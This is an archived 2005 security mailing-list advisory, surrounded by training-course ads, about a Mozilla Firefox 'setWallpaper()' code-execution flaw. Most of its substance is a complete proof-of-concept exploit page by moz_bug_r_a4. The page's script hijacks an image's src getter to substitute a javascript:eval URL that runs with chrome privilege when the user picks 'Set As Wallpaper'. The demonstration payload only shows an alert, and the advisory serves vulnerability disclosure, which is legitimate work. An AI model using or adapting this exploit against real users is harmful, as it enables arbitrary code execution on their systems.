Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [NT] Mozilla Firefox and Suite "setWallpaper()" Code Execution (Exploit) |
|---|---|
| Date: | 2 Aug 2005 18:03:08 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Mozilla Firefox and Suite "setWallpaper()" Code Execution (Exploit) ------------------------------------------------------------------------ SUMMARY An error in Mozilla Firefox when it handles Wallpapers could be exploited by attackers to run arbitrary code on a vulnerable system by convincing a user to use the "Set As Wallpaper" context menu item on a specially crafted image. DETAILS // Exploit by moz_bug_r_a4 < ?xml version="1.0"?> < html xmlns="http://www.w3.org/1999/xhtml"> < head> < style> IMG { display: block; width: 96px; height: 96px; border: 1px solid #f00; /*background-image: url("http://www.mozilla.org/images/mozilla-16.png");*/ background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN 2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2 2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL AAAAABJRU5ErkJggg=="); } < /style> < /head> < body> < h3>Arbitrary code execution via setWallpaper()< /h3> < pre> 1. Right click on the image. 2. Choose "Set As Wallpaper..." from the context menu. A dialog that shows Components.stack will appear. < /pre> < IMG id="i"/> < script> < ![CDATA[ var sx = navigator.productSub < 20050622 ? 2 : 4; // it needs chrome privilege to get |Components.stack| var code = "alert('Exploit!\\n\\n' + Components.stack);"; var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\'); var u = [ "http://www.mozilla.org/images/mozilla-16.png", "javascript:eval('" + evalCode + "')" ]; var sc = 0; var i = document.getElementById("i"); i.addEventListener("contextmenu", function(e) { sc = 0; }, false); i.__defineGetter__("src", function() { //return (confirm(++sc)) ? u[0] : u[1]; return (++sc < sx) ? u[0] : u[1]; }); ]]> < /script> < /body> < /html> ADDITIONAL INFORMATION The information has been provided by moz_bug_r_a4. The original article can be found at: <http://www.frsirt.com/exploits/20050712.mfsa2005-55exploit.php> http://www.frsirt.com/exploits/20050712.mfsa2005-55exploit.php ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [NEWS] Gecko Based Browsers Multiple Vulnerabilities (Code Execution, Cross Site Scripting, Window Spoofing), SecuriTeam |
|---|---|
| Next by Date: | [UNIX] ProFTPd Format String Vulnerabilities, SecuriTeam |
| Previous by Thread: | [NEWS] Gecko Based Browsers Multiple Vulnerabilities (Code Execution, Cross Site Scripting, Window Spoofing), SecuriTeam |
| Next by Thread: | [UNIX] ProFTPd Format String Vulnerabilities, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |